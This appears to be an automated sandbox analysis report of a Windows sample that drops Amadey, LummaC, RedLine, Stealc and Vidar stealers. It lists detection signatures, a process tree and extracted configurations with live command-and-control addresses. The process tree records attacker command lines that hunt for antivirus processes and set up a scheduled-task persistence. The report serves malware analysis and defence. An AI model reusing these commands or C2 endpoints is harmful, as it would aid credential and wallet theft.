Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1543026
MD5:	f257f5ef2a5f13cd994e48884b58af95
SHA1:	635975a431d3898aa6f4c049772b5082e6ad275e
SHA256:	f463bb94ce95ce298bf3d1ea7c262b22363061f6340f14c688d22cf696063f47
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, LummaC Stealer, RedLine, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Sigma detected: Search for Antivirus process

Yara detected Amadeys stealer DLL

Yara detected AntiVM3

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected RedLine Stealer

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to start a terminal service

Creates multiple autostart registry keys

Drops PE files with a suspicious file extension

Drops large PE files

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

Installs new ROOT certificates

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has a writeable .text section

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Reads the System eventlog

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Sigma detected: New RUN Key Pointing to Suspicious Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Creates job files (autostart)

Deletes files inside the Windows folder

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops certificate files (DER)

Enables debug privileges

Enables security privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: SCR File Write Event

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Screensaver Binary File Creation

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 6580 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F257F5EF2A5F13CD994E48884B58AF95)

axplong.exe (PID: 5512 cmdline: "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: F257F5EF2A5F13CD994E48884B58AF95)

axplong.exe (PID: 6132 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: F257F5EF2A5F13CD994E48884B58AF95)

axplong.exe (PID: 3924 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: F257F5EF2A5F13CD994E48884B58AF95)

zxcv.exe (PID: 6128 cmdline: "C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe" MD5: A5CF5DE46EC3F0A677E94188B19E7862)

zxcv.exe (PID: 5456 cmdline: "C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe" MD5: A5CF5DE46EC3F0A677E94188B19E7862)

zxcv.exe (PID: 6480 cmdline: "C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe" MD5: A5CF5DE46EC3F0A677E94188B19E7862)

ofHIebp8us.exe (PID: 5548 cmdline: "C:\Users\user\AppData\Roaming\ofHIebp8us.exe" MD5: FD381B2627904D8365229D1DDD7E221F)

Cd0bGrjt9g.exe (PID: 6668 cmdline: "C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe" MD5: 131D164783DB3608E4B2E97428E17028)

WerFault.exe (PID: 6520 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6128 -s 312 MD5: C31336C1EFC2CCB44B4326EA793040F2)

stealc_default2.exe (PID: 5864 cmdline: "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe" MD5: 68A99CF42959DC6406AF26E91D39F523)

gold.exe (PID: 2612 cmdline: "C:\Users\user\AppData\Local\Temp\1000474001\gold.exe" MD5: 9E675BBAF944EEEE4F1E7428A5B22C95)

InstallUtil.exe (PID: 3448 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

OFF011F112LUQGJPCDB24W.exe (PID: 1516 cmdline: "C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe" MD5: 97A370ACA7F83E19D8295AF2221BF211)

Offnewhere.exe (PID: 5876 cmdline: "C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe" MD5: 563E12FFD633CFB480AB1F3153676D22)

myrdx.exe (PID: 4196 cmdline: "C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe" MD5: A904AE8B26C7D421140BE930266ED425)

MSBuild.exe (PID: 3524 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

WerFault.exe (PID: 5332 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 260 MD5: C31336C1EFC2CCB44B4326EA793040F2)

1.exe (PID: 1732 cmdline: "C:\Users\user\AppData\Local\Temp\1000802001\1.exe" MD5: BF43ACACD11D09300691CF9449C386D1)

splwow64.exe (PID: 2972 cmdline: "C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe" MD5: 5D97C2475C8A4D52E140EF4650D1028B)

cmd.exe (PID: 6200 cmdline: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 6308 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 1632 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 5764 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

Conhost.exe (PID: 4284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

findstr.exe (PID: 4524 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 1580 cmdline: cmd /c md 197036 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 5704 cmdline: findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 5264 cmdline: cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Jurisdiction.pif (PID: 5924 cmdline: Jurisdiction.pif T MD5: 18CE19B57F43CE0A5AF149C96AECC685)

cmd.exe (PID: 4832 cmdline: cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 3736 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

Conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

13a34faa3c.exe (PID: 6532 cmdline: "C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe" MD5: 26D8D52BAC8F4615861F39E118EFA28D)

d0d468f327.exe (PID: 5168 cmdline: "C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe" MD5: FA715FFB10963C654D62D2690ACAE23D)

4ad48d7d65.exe (PID: 1600 cmdline: "C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe" MD5: 79844A66D5D7D52EC7836502F3F917FC)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default_valenciga"}

Threatname: LummaC

{"C2 url": ["fadehairucw.store", "presticitpo.store", "thumbystriw.store", "founpiuer.store", "scriptyprefej.store", "navygenerayk.store", "necklacedmny.store", "crisiwarny.store"], "Build id": "LOGS11--LiveTraffic"}

Threatname: Vidar

{"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default_valenciga"}

Threatname: Amadey

{"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}

Threatname: RedLine

{"C2 url": "89.105.223.196:29155", "Bot Id": "RDX", "Authorization Header": "21d3b2e8d7fdeff423c7a5819c5e64ed"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_default2[1].exe	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_default2[1].exe	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000024.00000003.3426127285.0000000001384000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000024.00000003.3212872917.0000000001382000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000003.00000002.2198640444.0000000000261000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000013.00000002.2774776253.0000000003571000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2175084729.0000000000571000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000002B.00000003.3052484261.0000000004F50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000024.00000003.3241887546.0000000001382000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000024.00000003.3302300126.0000000001382000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.2158174762.00000000048E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000002B.00000002.3142776921.0000000000441000.00000040.00000001.01000000.00000023.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000013.00000002.2813225946.0000000005CE0000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000007.00000003.2626880890.0000000004D30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000024.00000003.3274758029.0000000001382000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000024.00000003.3330816935.0000000001383000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000000.2686160117.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000013.00000002.2806606580.0000000004802000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000024.00000003.3330670556.0000000001382000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2158216245.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000024.00000003.3270101653.0000000001382000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000024.00000003.3242119222.0000000001382000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000024.00000003.3268957101.0000000001382000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.2886105690.00000000007EE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000002B.00000002.3186818225.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000016.00000002.2910389172.00000000002AC000.00000004.00000001.01000000.00000015.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000003.2087722610.0000000004F10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000017.00000002.3026057510.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000002.00000002.2198511022.0000000000261000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000017.00000002.3053254646.0000000002E90000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: stealc_default2.exe PID: 5864	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: stealc_default2.exe PID: 5864	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: stealc_default2.exe PID: 5864	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: stealc_default2.exe PID: 5864	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: gold.exe PID: 2612	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: gold.exe PID: 2612	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: myrdx.exe PID: 4196	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 3524	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 3524	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: d0d468f327.exe PID: 5168	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: d0d468f327.exe PID: 5168	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: d0d468f327.exe PID: 5168	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 4ad48d7d65.exe PID: 1600	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 4ad48d7d65.exe PID: 1600	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 41 entries

Unpacked PEs

Source	Rule	Description	Author
19.2.gold.exe.5ce0000.9.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
14.0.stealc_default2.exe.ca0000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
2.2.axplong.exe.260000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
22.2.myrdx.exe.280000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.2.axplong.exe.260000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
7.2.axplong.exe.260000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
19.2.gold.exe.4884c20.6.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
23.2.MSBuild.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
14.2.stealc_default2.exe.ca0000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
43.2.4ad48d7d65.exe.440000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.file.exe.570000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 6 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ProcessId: 3924, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4ad48d7d65.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ProcessId: 3924, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4ad48d7d65.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: Jurisdiction.pif T, CommandLine: Jurisdiction.pif T, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6200, ParentProcessName: cmd.exe, ProcessCommandLine: Jurisdiction.pif T, ProcessId: 5924, ProcessName: Jurisdiction.pif

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif, ProcessId: 5924, TargetFilename: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe, ParentProcessId: 2972, ParentProcessName: splwow64.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat, ProcessId: 6200, ProcessName: cmd.exe

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif, ProcessId: 5924, TargetFilename: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe, ProcessId: 6532, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LgAmARwZ.url

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6200, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 4524, ProcessName: findstr.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_default2[1].exe	Avira: detection malicious, Label: TR/AD.Stealc.cucnc
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
